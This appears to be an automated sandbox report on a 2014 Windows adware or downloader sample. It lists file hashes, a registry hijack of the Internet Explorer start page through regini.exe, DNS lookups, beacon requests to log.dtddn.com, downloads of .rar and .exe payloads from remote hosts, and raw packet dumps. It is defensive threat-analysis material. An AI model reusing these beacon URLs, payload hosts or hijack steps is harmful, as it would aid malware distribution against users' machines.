Analysis Date2014-10-21 19:27:45
MD509c1f02273718de3c85aa48b14574c91
SHA10d27b23e4028bf959859fbeb4da26b4dccddc12a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 4d937a8e5003fcf49013956130717ed2 sha1: 465445591927a7d2e77aa74177189b46b8521435 size: 159744
Section.data md5: 620f0b67a91f7f74151bc5be745b7110 sha1: 1ceaf73df40e531df3bfb26b4fb7cd95fb7bff1d size: 4096
Section.rsrc md5: 2efade0e17fb7f76e0a73a892dbcceb8 sha1: 171fd810fc62b55a7ec1db398457467596484a5d size: 8192
Timestamp2014-10-08 04:39:56
VersionInternalName: myslrqnsb
FileVersion: 1.00
CompanyName: Jbre7r
ProductName: myslrqnsb
ProductVersion: 1.00
OriginalFilename: myslrqnsb.exe
PackerMicrosoft Visual Basic v5.0
PEhashb5df6a116eaff459482a879263e66932e8bb58b2
IMPhashd20119d46010d062db4fdb6d8951ee37

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\VB and VBA Program Settings\u2p\m0q\Edit ➝
3102\\x00
RegistryHKEY_CURRENT_USER\Software\VB and VBA Program Settings\u2p\w2m\copin ➝
509302014979\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\htjxvm.ini
Creates File\Device\Afd\Endpoint
Creates File\Device\Afd\AsyncConnectHlp
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\htjxvm.ini
Creates ProcessC:\WINDOWS\System32\regini.exe "C:\Documents and Settings\Administrator\Local Settings\Temp\htjxvm.ini"
Creates MutexScanPK23102
Creates Mutexup3102
Winsock DNSdown.dtddn.com
Winsock DNSlog.dtddn.com
Winsock DNShost1.sz-guogeng.com
Winsock DNSdown.sz-guogeng.com
Winsock DNSdldir1.qq.com
Winsock DNSlnk1.dtddn.com
Winsock DNSlnk2.dtddn.com

Process
↳ C:\WINDOWS\System32\regini.exe "C:\Documents and Settings\Administrator\Local Settings\Temp\htjxvm.ini"

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.skoda-china.com/\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page ➝
http://www.skoda-china.com/\\x00

Network Details:

DNSlog.dtddn.com
Type: A
112.124.183.10
DNSlnk1.dtddn.com
Type: A
121.40.172.60
DNSlnk2.dtddn.com
Type: A
121.40.172.60
DNSdldir1.qq.com.cdngc.net
Type: A
174.35.56.227
DNSdldir1.qq.com.cdngc.net
Type: A
174.35.56.217
DNSdown.dtddn.com
Type: A
112.124.120.200
DNSdown.sz-guogeng.com
Type: A
112.124.120.200
DNSdldir1.qq.com
Type: A
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20C%20251&Info1=509302014979%2073500
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20C%20251&Info1=509302014979%2076734
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20C%20251&Info1=509302014979%2079796
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/1.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/2.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/3.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/4.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/5.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/6.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/7.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/8.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/9.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20Q2-Beg1&Info1=509302014979%201%200
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://down.dtddn.com/74.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_ExternalForum_15649.exe
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://down.sz-guogeng.com/74.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20Q2-DownI&Info1=509302014979%201%200%201
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/1.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/2.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/3.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/4.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/5.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/6.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/7.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk2.dtddn.com:7771/lnk/8.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://lnk1.dtddn.com:7771/lnk/9.rar
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20D%20251&Info1=509302014979%20113593
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20D%20251&Info1=509302014979%20116687
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP GEThttp://log.dtddn.com/UpLog3/worklog.asp?Name1=3102%20D%20251&Info1=509302014979%20119765
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Flows TCP192.168.1.1:1031 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1032 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1033 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1034 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1035 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1036 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1037 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1038 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1039 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1040 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1041 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1042 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1043 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1044 ➝ 174.35.56.227:80
Flows TCP192.168.1.1:1045 ➝ 174.35.56.227:80
Flows TCP192.168.1.1:1046 ➝ 174.35.56.227:80
Flows TCP192.168.1.1:1047 ➝ 174.35.56.227:80
Flows TCP192.168.1.1:1048 ➝ 112.124.120.200:80
Flows TCP192.168.1.1:1049 ➝ 174.35.56.227:80
Flows TCP192.168.1.1:1050 ➝ 174.35.56.227:80
Flows TCP192.168.1.1:1051 ➝ 174.35.56.227:80
Flows TCP192.168.1.1:1052 ➝ 112.124.120.200:80
Flows TCP192.168.1.1:1053 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1054 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1055 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1056 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1057 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1058 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1059 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1060 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1061 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1062 ➝ 121.40.172.60:7771
Flows TCP192.168.1.1:1063 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1064 ➝ 112.124.183.10:80
Flows TCP192.168.1.1:1065 ➝ 112.124.183.10:80

Raw Pcap
0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 30432532 30323531 26496e66   02%20C%20251&Inf
0x00000030 (00048)   6f313d35 30393330 32303134 39373925   o1=509302014979%
0x00000040 (00064)   32303733 35303020 48545450 2f312e31   2073500 HTTP/1.1
0x00000050 (00080)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000080 (00128)   6c653b20 57696e33 323b2057 696e4874   le; Win32; WinHt
0x00000090 (00144)   74702e57 696e4874 74705265 71756573   tp.WinHttpReques
0x000000a0 (00160)   742e3529 0d0a486f 73743a20 6c6f672e   t.5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 30432532 30323531 26496e66   02%20C%20251&Inf
0x00000030 (00048)   6f313d35 30393330 32303134 39373925   o1=509302014979%
0x00000040 (00064)   32303736 37333420 48545450 2f312e31   2076734 HTTP/1.1
0x00000050 (00080)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000080 (00128)   6c653b20 57696e33 323b2057 696e4874   le; Win32; WinHt
0x00000090 (00144)   74702e57 696e4874 74705265 71756573   tp.WinHttpReques
0x000000a0 (00160)   742e3529 0d0a486f 73743a20 6c6f672e   t.5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 30432532 30323531 26496e66   02%20C%20251&Inf
0x00000030 (00048)   6f313d35 30393330 32303134 39373925   o1=509302014979%
0x00000040 (00064)   32303739 37393620 48545450 2f312e31   2079796 HTTP/1.1
0x00000050 (00080)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000080 (00128)   6c653b20 57696e33 323b2057 696e4874   le; Win32; WinHt
0x00000090 (00144)   74702e57 696e4874 74705265 71756573   tp.WinHttpReques
0x000000a0 (00160)   742e3529 0d0a486f 73743a20 6c6f672e   t.5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f312e72 61722048   GET /lnk/1.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f322e72 61722048   GET /lnk/2.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f332e72 61722048   GET /lnk/3.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f342e72 61722048   GET /lnk/4.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f352e72 61722048   GET /lnk/5.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f362e72 61722048   GET /lnk/6.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f372e72 61722048   GET /lnk/7.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f382e72 61722048   GET /lnk/8.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b322e 64746464 6e2e636f   t: lnk2.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f6c6e6b 2f392e72 61722048   GET /lnk/9.rar H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b2057 696e3332   ompatible; Win32
0x00000050 (00080)   3b205769 6e487474 702e5769 6e487474   ; WinHttp.WinHtt
0x00000060 (00096)   70526571 75657374 2e35290d 0a486f73   pRequest.5)..Hos
0x00000070 (00112)   743a206c 6e6b312e 64746464 6e2e636f   t: lnk1.dtddn.co
0x00000080 (00128)   6d3a3737 37310d0a 436f6e6e 65637469   m:7771..Connecti
0x00000090 (00144)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000a0 (00160)   0d0a3529 0d0a486f 73743a20 6c6f672e   ..5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f55704c 6f67332f 776f726b   GET /UpLog3/work
0x00000010 (00016)   6c6f672e 6173703f 4e616d65 313d3331   log.asp?Name1=31
0x00000020 (00032)   30322532 3051322d 42656731 26496e66   02%20Q2-Beg1&Inf
0x00000030 (00048)   6f313d35 30393330 32303134 39373925   o1=509302014979%
0x00000040 (00064)   32303125 32303020 48545450 2f312e31   201%200 HTTP/1.1
0x00000050 (00080)   0d0a4163 63657074 3a202a2f 2a0d0a55   ..Accept: */*..U
0x00000060 (00096)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000070 (00112)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000080 (00128)   6c653b20 57696e33 323b2057 696e4874   le; Win32; WinHt
0x00000090 (00144)   74702e57 696e4874 74705265 71756573   tp.WinHttpReques
0x000000a0 (00160)   742e3529 0d0a486f 73743a20 6c6f672e   t.5)..Host: log.
0x000000b0 (00176)   64746464 6e2e636f 6d0d0a43 6f6e6e65   dtddn.com..Conne
0x000000c0 (00192)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x00000060 (00096)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x00000070 (00112)   2057696e 33323b20 57696e48 7474702e    Win32; WinHttp.
0x00000080 (00128)   57696e48 74747052 65717565 73742e35   WinHttpRequest.5
0x00000090 (00144)   290d0a48 6f73743a 20646c64 6972312e   )..Host: dldir1.
0x000000a0 (00160)   71712e63 6f6d0d0a 436f6e6e 65637469   qq.com..Connecti
0x000000b0 (00176)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x000000c0 (00192)   0d0a696f 6e3a204b 6565702d 416c6976   ..ion: Keep-Aliv
0x000000d0 (00208)   650d0a0d 0a                           e....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f457874   rowser_Setup_Ext
0x00000020 (00032)   65726e61 6c466f72 756d5f31 35363439   ernalForum_15649
0x00000030 (00048)   2e657865 20485454 502f312e 310d0a41   .exe HTTP/1.1..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000050 (00080)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
